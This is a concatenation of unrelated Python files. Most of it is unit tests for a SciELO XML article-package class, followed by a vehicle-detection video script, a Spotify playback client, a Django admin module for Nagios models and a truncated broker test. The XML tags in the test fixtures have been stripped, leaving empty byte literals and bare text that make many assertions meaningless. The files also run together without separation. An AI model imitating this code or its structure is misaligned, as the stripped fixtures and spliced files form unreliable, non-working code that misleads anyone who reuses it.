xml = """
Old mixed-citation
""" self.package = SPS_Package(etree.fromstring(xml)) self.references = { "1": "1. New mixed-citation", "2": "2 Updated mixed-citation", } def test_should_add_mixed_when_element_is_missing(self): self.package.update_mixed_citations(self.references) self.assertIn(b"", etree.tostring(self.package.xmltree)) self.assertIn( b"1. New mixed-citation", etree.tostring(self.package.xmltree), ) def test_should_not_update_an_existing_mixed_citation_if_override_is_false(self): self.package.update_mixed_citations(self.references) self.assertNotIn(b"", etree.tostring(self.package.xmltree)) self.assertIn( b"Old mixed-citation", etree.tostring(self.package.xmltree), ) def test_should_update_an_existing_mixed_citation_if_override_is_true(self): self.package.update_mixed_citations(self.references, override=True) self.assertIn(b"", etree.tostring(self.package.xmltree)) self.assertNotIn( b"Old mixed-citation", etree.tostring(self.package.xmltree), ) self.assertIn( b"2 Updated mixed-citation", etree.tostring(self.package.xmltree), ) def test_should_convert_html_tags_to_jats_tags(self): self.references["1"] = "text text" self.package.update_mixed_citations(self.references) self.assertIn( b"text text", etree.tostring(self.package.xmltree), ) def test_should_not_update_the_mixed_citations_if_the_references_dict_have_wrong_indexes( self ): self.package.update_mixed_citations({"10": "New mixed-citation"}) self.assertNotIn( b"New mixed-citation", etree.tostring(self.package.xmltree), ) def test_should_not_update_the_label_tag_when_extracted_number_does_not_match_with_order_number( self ): references = {"1": "Reference without label"} self.package.update_mixed_citations(references) self.assertIn( b"Reference without label", etree.tostring(self.package.xmltree), ) self.assertNotIn(b"", etree.tostring(self.package.xmltree)) class TestGetRefItems(unittest.TestCase): def _get_sps_package(self, text): return SPS_Package(etree.fromstring(text), None) def test__get_ref_items_returns_ref_list_three_ref_items(self): text = """
1 2 3
""" xml = etree.fromstring(text) body = xml.find(".//body") _sps_package = self._get_sps_package(text) ref_items = _sps_package._get_ref_items(body) self.assertEqual(ref_items[0].text, "1") self.assertEqual(ref_items[1].text, "2") self.assertEqual(ref_items[2].text, "3") def test__get_ref_items_returns_subarticle_ref_list_ref_items(self): text = """
1 2 3
""" xml = etree.fromstring(text) body = xml.find(".//sub-article/body") _sps_package = self._get_sps_package(text) ref_items = _sps_package._get_ref_items(body) self.assertEqual(len(ref_items), 3) class Test_SPS_Package_Order(unittest.TestCase): article_xml = """
{}
""" def _get_sps_package(self, fpage=None, other=None, pid_v2=None): items = ( fpage and "{}".format(fpage), other and '{}'.format( other), pid_v2 and '{}'.format( pid_v2), ) article_meta_xml = "".join((item for item in items if item)) xml = self.article_xml.format(article_meta_xml) xmltree = etree.fromstring(xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_order_returns_none_because_none_is_set(self): _sps_package = self._get_sps_package() self.assertIsNone(_sps_package.order) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_fpage_has_more_than_five_digits(self): _sps_package = self._get_sps_package(fpage="123456") self.assertIsNone(_sps_package.order) self.assertEqual("123456", _sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_fpage_is_alpha(self): _sps_package = self._get_sps_package(fpage="a") self.assertIsNone(_sps_package.order) self.assertEqual("a", _sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_fpage_is_alphanum(self): _sps_package = self._get_sps_package(fpage="a1") self.assertIsNone(_sps_package.order) self.assertEqual("a1", _sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_other_has_more_than_five_digits(self): _sps_package = self._get_sps_package(other="123456") self.assertIsNone(_sps_package.order) self.assertEqual("123456", _sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_other_is_alpha(self): _sps_package = self._get_sps_package(other="a") self.assertIsNone(_sps_package.order) self.assertEqual("a", _sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_other_is_alphanum(self): _sps_package = self._get_sps_package(other="a1") self.assertIsNone(_sps_package.order) self.assertEqual("a1", _sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_pid_v2_length_is_not_23(self): _sps_package = self._get_sps_package(pid_v2="1234512345123451234512345") self.assertIsNone(_sps_package.order) self.assertEqual("1234512345123451234512345", _sps_package.scielo_pid_v2) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_none_because_pid_v2_last_five_digits_is_alpha(self): _sps_package = self._get_sps_package(pid_v2="123451234512345123ABCDE") self.assertIsNone(_sps_package.order) self.assertEqual("123451234512345123ABCDE", _sps_package.scielo_pid_v2) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_none_because_pid_v2_last_five_digits_is_alphanum(self): _sps_package = self._get_sps_package(pid_v2="1234512345123451234512A") self.assertIsNone(_sps_package.order) self.assertEqual("1234512345123451234512A", _sps_package.scielo_pid_v2) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_pid_v2_last_five_digits(self): _sps_package = self._get_sps_package(pid_v2="12345123451234512345123") self.assertEqual("45123", _sps_package.order) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_fpage(self): _sps_package = self._get_sps_package(fpage="123") self.assertEqual("00123", _sps_package.order) self.assertIsNone(_sps_package.scielo_pid_v2) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_other(self): _sps_package = self._get_sps_package(other="623") self.assertEqual("00623", _sps_package.order) self.assertIsNone(_sps_package.scielo_pid_v2) self.assertIsNone(_sps_package.fpage) self.assertEqual("623", _sps_package.article_id_which_id_type_is_other) def test_order_returns_pid_v2_last_five_digits(self): _sps_package = self._get_sps_package(pid_v2="12345123451234512345123") self.assertEqual("45123", _sps_package.order) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_pid_v2_last_five_digits_by_order_of_precedence(self): # pid_v2 > other > fpage _sps_package = self._get_sps_package( pid_v2="12345123451234512345123", fpage="123", other="543") self.assertEqual("45123", _sps_package.order) self.assertEqual("123", _sps_package.fpage) self.assertEqual("543", _sps_package.article_id_which_id_type_is_other) self.assertEqual("12345123451234512345123", _sps_package.scielo_pid_v2) def test_order_returns_other_by_order_of_precedence(self): # pid_v2 > other > fpage _sps_package = self._get_sps_package(fpage="123", other="543") self.assertEqual("00543", _sps_package.order) self.assertEqual("123", _sps_package.fpage) self.assertEqual("543", _sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_fpage_by_order_of_precedence(self): # pid_v2 > other > fpage _sps_package = self._get_sps_package(fpage="123", other="543A") self.assertEqual("00123", _sps_package.order) self.assertEqual("123", _sps_package.fpage) self.assertEqual("543A", _sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) class Test_SPS_Package_SetAttrIfRequired_Sets_DATA(unittest.TestCase): def setUp(self): article_xml = """
""" xmltree = etree.fromstring(article_xml) self._sps_package = SPS_Package(xmltree, "nome-do-arquivo") def test_fix_sets_scielo_pid_v2(self): self._sps_package.fix( "scielo_pid_v2", "S0000-00002019000512345") self.assertIn( 'S0000-00002019000512345', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_sets_aop_pid(self): self._sps_package.fix( "aop_pid", "S0000-00002019000512345") self.assertIn( 'S0000-00002019000512345', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_sets_article_id_which_id_type_is_other(self): self._sps_package.fix( "article_id_which_id_type_is_other", "12") self.assertIn( '00012', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_sets_original_language(self): self._sps_package.fix( "original_language", "es") self.assertIn( '
', str(etree.tostring(self._sps_package.xmltree)) ) class Test_SPS_Package_SetAttrIfRequired_Keeps_Original_DATA(unittest.TestCase): article_xml = """
S0000-00002019000598765 S0000-00002019000598765 98765
""" def _get_sps_package(self, article_meta_xml): xml = self.article_xml.format(article_meta_xml) xmltree = etree.fromstring(xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_fix_keeps_original_value_of_original_scielo_pid_v2(self): article_meta_xml = ( '' 'S0000-00002019000598765' ) _sps_package = self._get_sps_package(article_meta_xml) with self.assertRaises(NotAllowedtoChangeAttributeValueError): _sps_package.fix( "scielo_pid_v2", "S0000-00002019000512345") self.assertIn( 'S0000-00002019000598765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_keeps_original_value_of_original_aop_pid(self): article_meta_xml = ( 'S0000-00002019000598765' ) _sps_package = self._get_sps_package(article_meta_xml) with self.assertRaises(NotAllowedtoChangeAttributeValueError): _sps_package.fix("aop_pid", "S1518-87872019053000621") self.assertIn( 'S0000-00002019000598765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_keeps_original_value_of_original_article_id_which_id_type_is_other(self): article_meta_xml = """ 98765 """ _sps_package = self._get_sps_package(article_meta_xml) with self.assertRaises(NotAllowedtoChangeAttributeValueError): _sps_package.fix("article_id_which_id_type_is_other", "621") self.assertIn( '98765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_keeps_original_value_of_original_lang(self): _sps_package = self._get_sps_package("") with self.assertRaises(NotAllowedtoChangeAttributeValueError): _sps_package.fix("original_language", "pt") self.assertIn( '
', str(etree.tostring(_sps_package.xmltree)) ) class Test_SPS_Package_SetAttrIfRequired_Update_DATA(unittest.TestCase): def setUp(self): article_xml = """
incorrect incorrect incorrect
""" xmltree = etree.fromstring(article_xml) self._sps_package = SPS_Package(xmltree, "nome-do-arquivo") def test_fix_replaces_value_of_scielo_pid_v2(self): self._sps_package.fix( "scielo_pid_v2", "S0000-00002019000512345") self.assertIn( 'S0000-00002019000512345', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_replaces_value_of_aop_pid(self): self._sps_package.fix( "aop_pid", "S1518-87872019053000621") self.assertIn( 'S1518-87872019053000621', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_replaces_value_of_article_id_which_id_type_is_other(self): self._sps_package.fix( "article_id_which_id_type_is_other", "621") self.assertIn( '00621', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_replaces_value_of_original_lang(self): self._sps_package.fix("original_language", "pt") self.assertIn( '
', str(etree.tostring(self._sps_package.xmltree)) ) class Test_is_valid_value_for_order(unittest.TestCase): def test_raises_exception_because_value_is_none(self): with self.assertRaises(InvalidValueForOrderError): is_valid_value_for_order(None) def test_raises_exception_because_value_is_str(self): with self.assertRaises(InvalidValueForOrderError): is_valid_value_for_order("x") def test_raises_exception_because_value_is_zero(self): with self.assertRaises(InvalidValueForOrderError): is_valid_value_for_order("0") def test_raises_exception_because_value_is_outofrange(self): with self.assertRaises(InvalidValueForOrderError): is_valid_value_for_order("999999") def test_returns_true(self): result = is_valid_value_for_order("6") self.assertTrue(result) class Test_is_allowed_to_update(unittest.TestCase): def _get_sps_package(self, other, fpage): tag_other = "" if other: tag_other = f'{other}' tag_fpage = "" if fpage: tag_fpage = f'{fpage}' article_xml = f"""
incorrect incorrect {tag_other} {tag_fpage}
""" xmltree = etree.fromstring(article_xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_returns_true(self): sps_package = self._get_sps_package(other=None, fpage="vii") attr_name = "any_attribute" result = sps_package._is_allowed_to_update(attr_name, "1234") self.assertTrue(result) class TestIsAllowedToUpdate_article_id_which_id_type_is_other(unittest.TestCase): def _get_sps_package(self, other, fpage): tag_other = "" if other: tag_other = f'{other}' tag_fpage = "" if fpage: tag_fpage = f'{fpage}' article_xml = f"""
incorrect incorrect {tag_other} {tag_fpage}
""" xmltree = etree.fromstring(article_xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_returns_false(self): sps_package = self._get_sps_package(other="1234", fpage="vii") result = sps_package._is_allowed_to_update( "article_id_which_id_type_is_other", "1234") self.assertFalse(result) def test_returns_true(self): sps_package = self._get_sps_package(other=None, fpage="vii") result = sps_package._is_allowed_to_update( "article_id_which_id_type_is_other", "1234") self.assertTrue(result) def test_returns_raise_exception_because_attr_has_already_a_valid_value(self): sps_package = self._get_sps_package(other="1234", fpage="vii") with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: sps_package._is_allowed_to_update( "article_id_which_id_type_is_other", "222") expected = ( "Not allowed to update article_id_which_id_type_is_other " "(1234) with 222, " "because current is valid" ) self.assertEqual(expected, str(exc.exception)) def test_returns_raise_exception_because_new_value_is_invalid(self): sps_package = self._get_sps_package(other=None, fpage="vii") with self.assertRaises(InvalidAttributeValueError) as exc: sps_package._is_allowed_to_update( "article_id_which_id_type_is_other", "vIII") expected = ( "Not allowed to update article_id_which_id_type_is_other " "(None) with vIII, " "because new value is invalid" ) self.assertEqual(expected, str(exc.exception)) class TestIsAllowedToUpdate_scielo_pid_v2(unittest.TestCase): def _get_sps_package(self, pid_v2): tag_pid_v2 = "" if pid_v2: tag_pid_v2 = f'{pid_v2}' article_xml = f"""
incorrect {tag_pid_v2}
""" xmltree = etree.fromstring(article_xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_returns_false(self): sps_package = self._get_sps_package("S0000-00002019000512345") result = sps_package._is_allowed_to_update( "scielo_pid_v2", "S0000-00002019000512345") self.assertFalse(result) def test_returns_true(self): sps_package = self._get_sps_package(None) result = sps_package._is_allowed_to_update( "scielo_pid_v2", "S0000-00002019000512345") self.assertTrue(result) def test_returns_raise_exception_because_attr_has_already_a_valid_value(self): sps_package = self._get_sps_package("S0000-00002019000512345") with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: sps_package._is_allowed_to_update("scielo_pid_v2", "222") expected = ( "Not allowed to update scielo_pid_v2 " "(S0000-00002019000512345) with 222, " "because current is valid" ) self.assertEqual(expected, str(exc.exception)) def test_returns_raise_exception_because_new_value_is_invalid(self): sps_package = self._get_sps_package(None) with self.assertRaises(InvalidAttributeValueError) as exc: sps_package._is_allowed_to_update("scielo_pid_v2", "vIII") expected = ( "Not allowed to update scielo_pid_v2 " "(None) with vIII, " "because new value is invalid" ) self.assertEqual(expected, str(exc.exception)) class TestIsAllowedToUpdate_original_language(unittest.TestCase): def _get_sps_package(self, lang): article_xml = f"""
incorrect
""" xmltree = etree.fromstring(article_xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_returns_false(self): sps_package = self._get_sps_package("pt") result = sps_package._is_allowed_to_update( "original_language", "pt") self.assertFalse(result) def test_returns_true(self): sps_package = self._get_sps_package(None) result = sps_package._is_allowed_to_update( "original_language", "pt") self.assertTrue(result) def test_returns_raise_exception_because_attr_has_already_a_valid_value(self): sps_package = self._get_sps_package("pt") with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: sps_package._is_allowed_to_update("original_language", "222") expected = ( "Not allowed to update original_language " "(pt) with 222, " "because current is valid" ) self.assertEqual(expected, str(exc.exception)) def test_returns_raise_exception_because_new_value_is_invalid(self): sps_package = self._get_sps_package(None) with self.assertRaises(InvalidAttributeValueError) as exc: sps_package._is_allowed_to_update("original_language", "espanhol") expected = ( "Not allowed to update original_language " "(None) with espanhol, " "because new value is invalid" ) self.assertEqual(expected, str(exc.exception)) class Test_SPS_article_id_which_id_type_is_other(unittest.TestCase): def _get_sps_package(self, other, fpage): tag_other = "" if other: tag_other = f'{other}' tag_fpage = "" if fpage: tag_fpage = f'{fpage}' article_xml = f"""
incorrect incorrect {tag_other} {tag_fpage}
""" xmltree = etree.fromstring(article_xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_keeps_same_value(self): sps_package = self._get_sps_package(other="1234", fpage="vii") sps_package.article_id_which_id_type_is_other = "1234" self.assertEqual(sps_package.article_id_which_id_type_is_other, "1234") def test_update_with_new_value(self): sps_package = self._get_sps_package(other=None, fpage="vii") sps_package.article_id_which_id_type_is_other = "1234" self.assertEqual( sps_package.article_id_which_id_type_is_other, "01234") def test_raises_exception_because_attr_has_already_a_valid_value(self): sps_package = self._get_sps_package(other="1234", fpage="vii") with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: sps_package.article_id_which_id_type_is_other = "222" expected = ( "Not allowed to update article_id_which_id_type_is_other " "(1234) with 222, " "because current is valid" ) self.assertEqual(expected, str(exc.exception)) def test_raises_exception_because_new_value_is_invalid(self): sps_package = self._get_sps_package(other=None, fpage="vii") with self.assertRaises(InvalidAttributeValueError) as exc: sps_package._is_allowed_to_update( "article_id_which_id_type_is_other", "vIII") expected = ( "Not allowed to update article_id_which_id_type_is_other " "(None) with vIII, " "because new value is invalid" ) self.assertEqual(expected, str(exc.exception)) class Test_SPS_Package_Fix_Silently(unittest.TestCase): article_xml = """
S0000-00002019000598765 S0000-00002019000598765 98765
""" def _get_sps_package(self, article_meta_xml): xml = self.article_xml.format(article_meta_xml) xmltree = etree.fromstring(xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_fix_raises_no_exception_and_does_not_update_scielo_pid_v2(self): article_meta_xml = ( '' 'S0000-00002019000598765' ) _sps_package = self._get_sps_package(article_meta_xml) _sps_package.fix( "scielo_pid_v2", "S0000-00002019000512345", silently=True) self.assertIn( 'S0000-00002019000598765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_raises_no_exception_and_does_not_update_aop_pid(self): article_meta_xml = ( 'S0000-00002019000598765' ) _sps_package = self._get_sps_package(article_meta_xml) _sps_package.fix("aop_pid", "S1518-87872019053000621", silently=True) self.assertIn( 'S0000-00002019000598765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_raises_no_exception_and_does_not_update_article_id_which_id_type_is_other(self): article_meta_xml = """ 98765 """ _sps_package = self._get_sps_package(article_meta_xml) _sps_package.fix("article_id_which_id_type_is_other", "621", silently=True) self.assertIn( '98765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_raises_no_exception_and_does_not_update_lang(self): _sps_package = self._get_sps_package("") _sps_package.fix("original_language", "pt", silently=True) self.assertIn( '
', str(etree.tostring(_sps_package.xmltree)) ) class TestSourceJson(unittest.TestCase): @property def _json_content(self): return """{ "article": { "v32": [ { "_": "2A" } ], "v31": [ { "_": "60" } ] }, "fulltexts": { "html": { "en": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0004-282X2002000200003&tlng=en" }, "pdf": { "en": "http://www.scielo.br/pdf/anp/v60n2a/a03v60n2.pdf", "es": "http://www.scielo.br/pdf/anp/v60n2a/es_a03v60n2.pdf" } } }""" def test_issue_folder_returns(self): source = SourceJson(self._json_content) self.assertEqual("v60n2A", source.issue_folder) def test_renditions_metadata_returns(self): source = SourceJson(self._json_content) expected = { "en": "http://www.scielo.br/pdf/anp/v60n2a/a03v60n2.pdf", "es": "http://www.scielo.br/pdf/anp/v60n2a/es_a03v60n2.pdf" } self.assertEqual(expected, source.renditions_metadata) def test_fixed_renditions_metadata_returns(self): source = SourceJson(self._json_content) expected = { "en": "http://www.scielo.br/pdf/anp/v60n2A/a03v60n2.pdf", "es": "http://www.scielo.br/pdf/anp/v60n2A/es_a03v60n2.pdf" } self.assertEqual(expected, source.fixed_renditions_metadata) def test_get_renditions_metadata_returns(self): source = SourceJson(self._json_content) metadata = { "en": "http://www.scielo.br/pdf/anp/v60n2A/a03v60n2.pdf", "es": "http://www.scielo.br/pdf/anp/v60n2A/es_a03v60n2.pdf" } renditions = [ ("http://www.scielo.br/pdf/anp/v60n2A/a03v60n2.pdf", "a03v60n2"), ("http://www.scielo.br/pdf/anp/v60n2A/es_a03v60n2.pdf", "es_a03v60n2"), ] expected = (renditions, metadata) self.assertEqual(expected, source.get_renditions_metadata()) class TestIsValidValueForIssns(unittest.TestCase): def test_is_valid_value_for_issns_raises_is_exception_because_value_is_empty_dict(self): with self.assertRaises(ValueError) as exc: is_valid_value_for_issns({}) self.assertIn("'epub' and/or 'ppub'", str(exc.exception)) def test_is_valid_value_for_issns_raises_is_exception_because_value_is_not_dict(self): with self.assertRaises(ValueError) as exc: is_valid_value_for_issns(('a', 'b')) self.assertIn("Expected dict", str(exc.exception)) def test_is_valid_value_for_issns_raises_is_exception_because_of_duplicated_values(self): with self.assertRaises(ValueError) as exc: is_valid_value_for_issns({"epub": 'x', "ppub": "x"}) self.assertIn("duplicated values", str(exc.exception)) def test_is_valid_value_for_issns_raises_is_exception_because_of_invalid_key(self): with self.assertRaises(ValueError) as exc: is_valid_value_for_issns({"invalid_key": 'y', "ppub": "x"}) self.assertIn("Expected dict which keys are 'epub' and/or 'ppub'.", str(exc.exception)) def test_is_valid_value_for_issns_raises_is_exception_because_of_invalid_values(self): with self.assertRaises(ValueError) as exc: is_valid_value_for_issns({"ppub": 'y', "epub": "x"}) self.assertIn("is not an ISSN", str(exc.exception)) class TestSPSPackageHasNoIssns(unittest.TestCase): def setUp(self): xml = f"""
""" xmltree = etree.fromstring(xml) self._sps_package = SPS_Package(xmltree, None) def test_get_issns_returns_none_because_there_is_no_issn(self): self.assertIsNone(self._sps_package.issns) def test_set_issns_updates_issns(self): expected = { "epub": "1209-8709", "ppub": "8809-8709", } self._sps_package.issns = { "epub": "1209-8709", "ppub": "8809-8709", } self.assertEqual(expected, self._sps_package.issns) xml = etree.tostring(self._sps_package.xmltree) self.assertIn(b'1209-8709', xml) self.assertIn(b'8809-8709', xml) def test_set_issns_raises_exception_if_new_value_is_invalid(self): expected = None with self.assertRaises(InvalidAttributeValueError) as exc: self._sps_package.issns = { "epub": "XXXX-YYY", "ppub": "8888-879", } self.assertEqual(expected, self._sps_package.issns) xml = etree.tostring(self._sps_package.xmltree) self.assertNotIn(b'XXXX-YYY', xml) self.assertNotIn(b'8888-879', xml) def test_fix_does_not_raise_exception_because_is_silenced(self): self._sps_package.fix('issns', 'invalid value', silently=True) self.assertIsNone(self._sps_package.issns) def test_fix_raises_exception_because_is_not_silenced(self): new_value = 'invalid value' with self.assertRaises(InvalidAttributeValueError) as exc: self._sps_package.fix('issns', new_value, silently=False) class TestSPSPackageHasIssns(unittest.TestCase): def setUp(self): xml = f"""
1234-0987 1834-0987
""" xmltree = etree.fromstring(xml) self._sps_package = SPS_Package(xmltree, None) def test_get_issns_returns_dict(self): expected = { "epub": "1234-0987", "ppub": "1834-0987", } self.assertEqual(expected, self._sps_package.issns) def test_set_issns_raises_exception_and_does_not_allowed_update_issns(self): expected = { "epub": "1234-0987", "ppub": "1834-0987", } with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: self._sps_package.issns = { "epub": "XXXX-YYYY", "ppub": "8888-8709", } self.assertIn("Not allowed to set ISSNs", str(exc.exception)) self.assertEqual(expected, self._sps_package.issns) xml = etree.tostring(self._sps_package.xmltree) self.assertIn(b'1234-0987', xml) self.assertIn(b'1834-0987', xml) def test_fix_does_not_raise_exception_because_is_silenced(self): new_value = { "epub": "1299-0987", "ppub": "1899-0987", } self._sps_package.fix('issns', new_value, silently=True) self.assertNotEqual(new_value, self._sps_package.issns) def test_fix_raises_exception_because_is_not_silenced(self): new_value = { "epub": "1299-0987", "ppub": "1899-0987", } with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: self._sps_package.fix('issns', new_value, silently=False) Alyxion/Udacity_SelfDrivingCarEngineerNd ##################################################################################################################### # # # This file is part of the 5th project of Udacity's Self-Driving Car Engineer Nd - Vehicle Detection and Tracking # # # # Copyright (c) 2018 by # # # ##################################################################################################################### # With help of this file you can compile project video by just running it. # If you did not do so yet you need to call the script Train_Classifier once to calibrate the camera and retrain # the classifier. # Add reference to files from previous project import sys import os rel_path = os.path.join(os.path.dirname(__file__), '..', '1_16_Project_4_Advanced_Lane_Lines') sys.path.append(rel_path) import cv2 import numpy as np from moviepy.editor import VideoFileClip import Vehicle_Video_Creator import AdvLaneCamera import AdvLaneVideoCreator import Vehicle_Trainer import Hog_Me import Object_Finder import Object_Classifier import Heater # Load camera calibration camera = AdvLaneCamera.AdvCamera() camera.load_from_pickle() # Load vehicle detection neural network trainer = Vehicle_Trainer.Vehicle_Trainer() do_train = False if do_train: print("Retraining classifier") trainer.classifier.use_svm = False trainer.train_vehicles('./../data/1_20_Object_Detection/classify/**/*.png', visualize=False) trainer.save_to_disk() else: trainer.load_from_disk() # Create video video_creator = Vehicle_Video_Creator.Vehicle_Video_Creator(trainer=trainer, camera=camera) output_video_name = 'test_videos_output/result.mp4' input_video_name = "project_video.mp4" input_clip = VideoFileClip(input_video_name) # sub_clip = input_clip.subclip(48,51) # sub_clip = input_clip.subclip(25,30) # sub_clip = input_clip.subclip(0,2) sub_clip = input_clip video_creator.add_lanes = True video_creator.process_video(sub_clip, output_video_name)0 import os import requests import spotipy import spotipy.oauth2 import spotipy.util import yaml SCOPES = ' '.join([ 'playlist-read-private', 'playlist-modify-public', 'user-read-playback-state', 'user-modify-playback-state', 'user-read-currently-playing', 'app-remote-control', ]) _BASE_URL = 'https://api.spotify.com' class Spotify: token = None _client = None _credentials = None def __init__(self): self._credentials = self._load_credentials() try: self._client = spotipy.Spotify(auth=self._credentials['auth']) self._client.me() except: self.login_user() self._client = spotipy.Spotify(auth=self._credentials['auth']) self.token = self._credentials['auth'] def login_user(self): token = spotipy.util.prompt_for_user_token(self._credentials['username'], SCOPES, client_id=self._credentials['client_id'], client_secret=self._credentials['client_secret'], redirect_uri='http://localhost:1337/callback', cache_path=os.path.expanduser(f"~/.q/spotify-cache-{self._credentials['username']}")) with open(os.path.expanduser("~/.q/spotify_credentials"), 'w') as stream: self._credentials['auth'] = token yaml.safe_dump(self._credentials, stream) def _load_credentials(self): with open(os.path.expanduser("~/.q/spotify_credentials"), 'r') as stream: return yaml.safe_load(stream) def currently_playing(self): return requests.request('GET', _BASE_URL + '/v1/me/player', headers={'Authorization': 'Bearer ' + self.token}) def next(self): requests.post(_BASE_URL + '/v1/me/player/next', headers={'Authorization': 'Bearer ' + self.token}) def prev(self): requests.post(_BASE_URL + '/v1/me/player/previous', headers={'Authorization': 'Bearer ' + self.token}) def play(self): requests.put(_BASE_URL + '/v1/me/player/play', headers={'Authorization': 'Bearer ' + self.token}) def pause(self): requests.put(_BASE_URL + '/v1/me/player/pause', headers={'Authorization': 'Bearer ' + self.token}) from .valueset import RegionAnnotation, ValueSet from .strided_interval import StridedInterval, CreateStridedInterval from .discrete_strided_interval_set import DiscreteStridedIntervalSet from .abstract_location import AbstractLocation from .bool_result import BoolResult, TrueResult, FalseResult, MaybeResult # -*- coding: utf-8 -*- # Copyright (C) <> # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE # OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # Adding models to Admin site for Nagios app from django.contrib import admin from apps.nagios.models import Satellite, SecurityPort class SatelliteAdmin(admin.ModelAdmin): list_display = ( 'name', 'active', 'is_gearman', 'alias', 'fqdn', 'ip_address') list_filter = ('active',) fieldsets = ( (None, { 'fields': ('name', 'active', 'is_gearman') }), ('Network settings', { 'fields': ('ip_address', 'alias', 'fqdn') }), ('Livestatus settings', { 'classes': ('collapse',), 'fields': ('live_port', 'nagios_url') }), ) class SecurityPortAdmin(admin.ModelAdmin): list_display = ('name', 'description', 'protocol', 'begin_port', 'end_port') fieldsets = ( ('Indentity', { 'fields': ('name', 'description', 'protocol') }), ('Range', { 'fields': ('begin_port', 'end_port') }), ) admin.site.register(Satellite, SatelliteAdmin) admin.site.register(SecurityPort, SecurityPortAdmin) tests/broker/test_search_cluster_esx.py #!/usr/bin/env python # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*- # ex: set expandtab softtabstop=4 shiftwidth=4: # # Copyright (C) 2010,2011,2012,2013,2014,2015,2016,2017 Contributor # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Module for testing the search cluster command (former search esx cluster queries).""" import unittest if __name__ == "__main__": import utils utils.import_depends() from brokertest import TestBrokerCommand class TestSearchClusterESX(TestBrokerCommand): def testclusteravailable(self): command = "search cluster --cluster_type esx --cluster utecl1" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchclean(out, "Metacluster: utmc1", command) self.matchclean(out, "Building: ut", command) def testclusterunavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--cluster', 'cluster-does-not-exist'] self.notfoundtest(command) def testmetaclusteravailabledeprecated(self): command = "search cluster --cluster_type esx --esx_metacluster 